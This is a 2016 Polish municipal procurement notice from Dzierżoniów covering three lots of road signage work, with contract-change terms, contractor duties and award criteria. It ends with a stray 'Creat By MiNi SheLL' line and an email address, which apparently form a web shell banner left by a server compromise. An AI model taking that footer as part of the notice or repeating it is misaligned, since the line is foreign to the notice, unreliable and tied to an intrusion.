<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość wprowadzenia zmian umowy:
Dotyczy wszystkich części zamówienia.
1) W zakresie zmiany terminu, wynagrodzenia:
a) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działanie nie są konsekwencją winy którejkolwiek ze stron umowy;
b) powodu siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
c) w przypadku konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
2) Zamawiający przewiduje również możliwość dokonania takich zmian postanowień zawartej umowy jak:
-  zmiana podwykonawcy (podwykonawców),
- zmiana danych Wykonawcy np. adresy, konta bankowego, nr telefonów, osób kontaktowych,
3) W  zakresie zmiany wynagrodzenia:
1. W zakresie określonym w § 6 projektu umowy (załącznik nr 2 do SIWZ dla części I zamówienia, załącznik nr 9 do SIWZ dla części II zamówienia, załącznik nr 17 do SIWZ dla części III zamówienia). Po upływie pierwszych 12 miesięcy obowiązywania umowy dopuszcza się zmianę wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
1.	stawki podatku od towarów i usług,
2.	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art.2 ust.3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
3.	zasad podlegania ubezpieczeniu społecznemu lub zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne - jeżeli te zmiany będą miały wpływ na koszty zamówienia przez Wykonawcę.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, ale nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.
	O wystąpieniu okoliczności mogących wpłynąć na zmianę umowy strony są zobowiązane poinformować pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/Article/id,1348.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2016 godzina 10:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bieżące utrzymanie oznakowania pionowego                            na terenie Dzierżoniowa w latach 2016-2018..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest bieżące utrzymanie oznakowania pionowego w zakresie określonym przez Zamawiającego, jak również wynikającym z aktualnych potrzeb takich, jak np. zdarzenia drogowe, wnioski mieszkańców, dewastacja oznakowania, likwidacja zagrożeń.
2. Zakres robót obejmuje:
1)	dostawę, montaż i demontaż słupków znaków drogowych, tabliczek z nazwami ulic i tablic informacyjnych oraz słupków zabezpieczających, wraz z naprawą nawierzchni chodnika lub pobocza po wykonanych pracach,
2)	malowanie słupków do znaków i tablic informacyjnych farbą ftalową na podkładzie farby miniowej lub słupków przeszkodowych,
3)	dostawę, montaż i demontaż tarczy znaków drogowych, tablic informacyjnych, tabliczek,
4)	poprawianie obróconych, wykrzywionych tarczy znaków i tablic informacyjnych, pionowanie słupków do znaków i tablic informacyjnych,
5)	mycie tarczy znaków drogowych i tablic informacyjnych,
6)	czyszczenie zamalowanych tarczy znaków drogowych i tablic informacyjnych środkami chemicznymi,
7)	dostawę i montaż tabliczek z herbem Dzierżoniowa i nazwami ulic.
3. Orientacyjne ilości usług wraz z ryczałtowymi cenami jednostkowymi zastały określone                 w kosztorysie ofertowym Wykonawcy, stanowiącym załącznik nr 1 do SIWZ.  W zależności od aktualnego zapotrzebowania Zamawiający zastrzega możliwość zmniejszania lub zwiększania ilości usług określonych w kosztorysie ofertowym, stanowiącym załącznik nr 1 do SIWZ. 
4. Znaki drogowe, materiały i inne urządzenia zastosowane w trakcie realizacji niniejszego zamówienia oraz zasady ich umieszczania powinny być zgodne z przepisami prawa                                     w szczególności z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r. Nr 220, poz. 2181 z późniejszymi zmianami) oraz: Specyfikacją techniczną utrzymania oznakowania pionowego na terenie Dzierżoniowa - stanowiącą załącznik nr 22 do SIWZ.
5. Przy realizacji zamówienia Wykonawca zobowiązany jest do przestrzegania przepisów prawa w zakresie bezpieczeństwa ruchu drogowego, bezpieczeństwa i higieny pracy oraz ochrony środowiska.  
6. Ponadto Wykonawca ma obowiązek:
1)	realizacji robót objętych zamówieniem z należytą starannością, terminowo, zgodnie ze swoją najlepszą wiedzą i doświadczeniem zgodnie z obowiązującymi normami technicznymi, przepisami ochrony środowiska oraz zasadami bhp;
2)	zawarcie przed podpisaniem niniejszej umowy, umowy ubezpieczenia odpowiedzialności cywilnej na kwotę nie niższą niż 40.000,00 zł rocznie, przez cały okres obowiązywania umowy;
3)	stosowanie się do wytycznych i wskazówek Zamawiającego, zapewnienie stałego dozoru nad realizacją robót;
4)	wyposażenie pracowników wykonujących roboty fizyczne w odpowiedni czysty strój,               z nazwą firmy wykonującej roboty, posiadający odpowiednie elementy odblaskowe;
5)	odpowiednie oznakowanie pojazdów wykorzystywanych przy wykonywaniu robót                w celu odróżniania ich od innych pojazdów uczestniczących w ruchu;
6)	dostarczenie Zamawiającemu w ciągu 30 dni od dnia podpisania umowy oświadczenia o przeszkoleniu w zakresie BHP oraz ochrony środowiska na stanowisku pracy pracowników zatrudnionych przy wykonywaniu usług związanych z realizacją przedmiotowego zamówienia;
7)	zapewnienie całodobowej łączność telefonicznej, umożliwiającej zgłaszanie nagłych zdarzeń (również przez funkcjonariuszy Policji i Straży Miejskiej);
8)	zabezpieczenie miejsce zdarzenia w ciągu 2 godzin od zgłoszenia telefonicznego oraz przywrócenie oznakowanie do stanu pierwotnego w ciągu 6 godzin, niezależnie od dnia tygodnia i pory wystąpienia zdarzenia, w przypadku nagłych zdarzeń (zniszczenie lub uszkodzenie oznakowania na skutek wypadku drogowego lub dewastacji oznakowania);
9)	posiadanie do stałej dyspozycji (w przypadku nagłych zdarzeń) oznakowania w co najmniej następującej ilości: A-7:4 szt, B-1:3 szt, B-2: 3 szt, B-20:2 szt, D-6: 4 szt;
10)	realizacja każdego typowanego zakresu robót, nawet ograniczonego do wykonania montażu pojedynczego elementu znaku;
11)	zabezpieczenie i oznakowanie miejsca prowadzonych robót;
12)	uporządkowanie terenu po wykonaniu robót;
13)	wykonywanie robót w sposób jak najmniej dezorganizujący ruch drogowy oraz usuwanie na bieżąco zbędnych materiałów i odpadów;
14)	przygotowanie przedmiot umowy do odbioru po uprzednim sprawdzeniu poprawności jego wykonania;
15)	wykonanie, co najmniej raz w tygodniu, przeglądu oznakowania na terenie Dzierżoniowa, w którym może uczestniczyć przedstawiciel Zamawiającego lub inspektor nadzoru; w przypadku stwierdzenia nieprawidłowości Wykonawca zgłasza je Zamawiającemu, który wyda odpowiednie dyspozycje dotyczące dalszych robót;
16)	 przechowywanie (magazynowanie) materiałów związanych z oznakowaniem dróg,
będącym własnością Zamawiającego. 
7. Wykonawca jest wytwórcą odpadów w rozumieniu ustawy o odpadach, na nim ciążą wszystkie obowiązki określone w w/w ustawie. Wykonawca ponosi wszelkie koszty związane z usunięciem odpadów z miejsca wytworzenia, wykorzystaniem odpadów i ich unieszkodliwieniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin Płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie oznakowania poziomego na terenie Dzierżoniowa w latach 2016-2018..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie oznakowania poziomego w zakresie określonym przez Zamawiającego, jak również wynikającym z aktualnych potrzeb.
2. Zakres robót obejmuje:
1.	malowanie oznakowania poziomego z zastosowaniem farby rozpuszczalnikowej bez mikrokulek szklanych o grubości warstwy 0,3 - 0,8mm,
2.	malowanie oznakowania poziomego z zastosowaniem farby rozpuszczalnikowej                                z mikrokulkami szklanymi o grubości warstwy 0,3 - 0,8mm,
3.	wykonanie oznakowania grubowarstwowego, odblaskowego, strukturalnego metodą chemoutwardzalną,
4.	usuwanie zbędnego oznakowania poziomego.
3. Orientacyjne ilości usług wraz z ryczałtowymi cenami jednostkowymi zastały określone
w kosztorysie ofertowym Wykonawcy, stanowiącym załącznik nr 8 do SIWZ.  W zależności od aktualnego zapotrzebowania Zamawiający zastrzega możliwość zmniejszania lub zwiększania ilości usług określonych w kosztorysie ofertowym, stanowiącym załącznik nr 8 do SIWZ.
4. Znaki drogowe, materiały i inne urządzenia zastosowane w trakcie realizacji niniejszego zamówienia oraz zasady ich umieszczania powinny być zgodne z przepisami prawa                                  w szczególności z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r. Nr 220, poz. 2181 z późniejszymi zmianami) oraz: Specyfikacją techniczną wykonania oznakowania poziomego na terenie Dzierżoniowa - stanowiącą załącznik nr 23 do SIWZ.
5. Przy realizacji zamówienia Wykonawca zobowiązany jest do przestrzegania przepisów prawa w zakresie bezpieczeństwa ruchu drogowego, bezpieczeństwa i higieny pracy oraz ochrony środowiska.
6. Ponadto Wykonawca ma obowiązek:
1)	realizacji robót objętych zamówieniem z należytą starannością, terminowo, zgodnie ze swoją najlepszą wiedzą i doświadczeniem zgodnie z obowiązującymi normami technicznymi, przepisami ochrony środowiska oraz zasadami bhp;
2)	zawarcie przed podpisaniem niniejszej umowy, umowy ubezpieczenia odpowiedzialności cywilnej na kwotę nie niższą niż 40.000,00 zł rocznie, przez cały okres obowiązywania umowy;
3)	zapewnienie stałego dozoru nad realizacją zadania;
4)	wykonanie przedmiotu zamówienia zgodnie z obowiązującymi normami technicznymi, przepisami prawa oraz specyfikacją techniczną, o której mowa w §2 ust. 6 projektu umowy (załącznik nr 9 do SIWZ);
5)	realizowanie robót w kolejności i terminach wyznaczonych przez Zamawiającego                                              w protokołach typowania robót;
6)	realizacja każdego typowanego zakresu robót, nawet ograniczonego do pomalowania powierzchni mniejszej niż 1 m2;
7)	rozpoczęcie robót w ciągu 5 dni roboczych od dnia uzyskania zlecenia;
8)	wykonywanie robót w sposób ciągły, każdego dnia roboczego, do czasu zakończenia zlecenia, chyba, że warunki atmosferyczne nie pozwolą na wykonywanie usług. Tylko                                        w uzasadnionych przypadkach Zamawiający dopuszcza przerwy w wykonywaniu rozpoczętego zlecenia, o czym Wykonawca zobowiązany jest poinformować Zamawiającego;
9)	wykonywanie malowanie oznakowania w czasie zmniejszonego natężenia ruchu,
 tj. w godzinach popołudniowych i wieczornych, w sposób nie powodujący zagrożenia w ruchu drogowym;
10)	we własnym zakresie i na własny koszt zabezpieczyć i oznakować strefy wykonywanych usług;
11)	organizacja, zabezpieczenie i oznakowanie miejsca prowadzonych robót;
12)	wykonywanie robót w sposób jak najmniej dezorganizujący ruch drogowy oraz usuwanie na bieżąco zbędnych materiałów i odpadów, zaleca się malowanie oznakowania w godzinach popołudniowych i mocnych;
13)	pozostawienie, po zakończeniu robót, terenu uporządkowanego, czystego, nadającego się do ponownego użytkowania;
14)	 zgłoszenie Zamawiającemu gotowość odbioru wykonanych robót;
15)	wyposażenie pracowników wykonujących roboty fizyczne w odpowiedni czysty strój,                 z nazwą firmy wykonującej roboty, posiadający odpowiednie elementy odblaskowe;
16)	odpowiednie oznakowanie pojazdów wykorzystywanych przy wykonywaniu robót                   w celu odróżniania ich od innych pojazdów uczestniczących w ruchu;
17)	dostarczenie Zamawiającemu w ciągu 30 dni od dnia podpisania umowy oświadczenia                       o przeszkoleniu w zakresie BHP oraz ochrony środowiska na stanowisku pracy pracowników zatrudnionych przy wykonywaniu usług związanych z realizacją przedmiotowego zamówienia.
7. Wykonawca jest wytwórcą odpadów w rozumieniu ustawy o odpadach, na nim ciążą wszystkie obowiązki określone w w/w ustawie. Wykonawca ponosi wszelkie koszty związane z usunięciem odpadów z miejsca wytworzenia, wykorzystaniem odpadów i ich unieszkodliwieniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 83</li>
<li>2. Przedłużenie okresu gwarancji na malowanie oznakowania na nawierzchni z kostki kamiennej - 5</li>
<li>3. Przedłużenie okresu gwarancji na malowanie oznakowania na nawierzchniach innych niż kostka kamienna - 6</li>
<li>4. Przedłużenie okresu gwarancji na oznakowanie grubowarstwowe - 6</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie oznakowania tymczasowego na terenie Dzierżoniowa w latach 2017-2018..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa, montaż, demontaż oznakowania drogowego montowanego na czas lokalnych imprez, świąt i innych okoliczności wskazanych przez Zamawiającego.
2. Zakres usług obejmuje:
1)	dostawę, montaż i demontaż urządzeń będących własnością Wykonawcy:
-	słupki wkopywane,
-	słupki z podstawą gumową,
-	tarcze znaków i tablic informacyjnych,
-	taśma ostrzegawcza U-22, 
-	szpilki stalowe do montowania taśmy ostrzegawczej
2)	 transport, montaż i demontaż urządzeń będących własnością Zamawiającego:
-	słupki wkopywane,
-	słupki z podstawą gumową,
-	tarcze znaków i tablic informacyjnych,
3)	wykonanie lic tablic informacyjnych tymczasowych (tarcze tablic pozostają własnością Wykonawcy).
3. Orientacyjne ilości usług wraz z ryczałtowymi cenami jednostkowymi zastały określone
w kosztorysie ofertowym Wykonawcy, stanowiącym załącznik nr 16 do SIWZ.                            W zależności od aktualnego zapotrzebowania Zamawiający zastrzega możliwość zmniejszania lub zwiększania ilości usług określonych w kosztorysie ofertowym, stanowiącym załącznik nr 16 do SIWZ. 	
4. Znaki drogowe, materiały i inne urządzenia zastosowane w trakcie realizacji niniejszej umowy oraz zasady ich umieszczania powinny być zgodne z przepisami prawa
w szczególności z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r.
w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach
(Dz. U. z 2003r. Nr 220, poz. 2181 z późniejszymi zmianami).
5. Ponadto Wykonawca ma obowiązek:
1)	realizacji robót objętych umową z należytą starannością, terminowo, zgodnie ze swoją najlepszą wiedzą i doświadczeniem zgodnie z obowiązującymi normami technicznymi, przepisami ochrony środowiska oraz zasadami bhp;
2)	stosowanie się do wytycznych i wskazówek Zamawiającego, zapewnienie stałego dozoru nad realizacją robót;
3)	wyposażenie pracowników wykonujących roboty fizyczne w odpowiedni czysty strój,             z nazwą firmy wykonującej roboty, posiadający odpowiednie elementy odblaskowe;
4)	odpowiednie oznakowanie pojazdów wykorzystywanych przy wykonywaniu robót                  w celu odróżniania ich od innych pojazdów uczestniczących w ruchu;
5)	sprawowanie stałego nadzoru nad oznakowaniem od czasu montażu oznakowania do czasu demontażu oznakowania i niezwłocznie usuwanie wszelkie usterki;
6)	pełnienie całodobowego dyżuru telefonicznego. Numer telefonu będzie dostępny dla pracowników urzędu oraz  i funkcjonariuszy Policji i Straży Miejskiej;
7)	w czasie obowiązywania oznakowania tymczasowego, dysponowanie dodatkowym oznakowaniem, w razie konieczności dostarczenie go i zamontuje w ciągu 45 minut od zgłoszenia takiej konieczności;
8)	 wykonanie oznakowania tymczasowego również w godzinach nocnych oraz w dni wolne od pracy;
9)	uporządkowanie terenu po wykonaniu robót.

6. Wykonawca jest wytwórcą odpadów w rozumieniu ustawy o odpadach, na nim ciążą wszystkie obowiązki określone w w/w ustawie. Wykonawca ponosi wszelkie koszty związane z usunięciem odpadów z miejsca wytworzenia, wykorzystaniem odpadów i ich unieszkodliwieniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin Płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com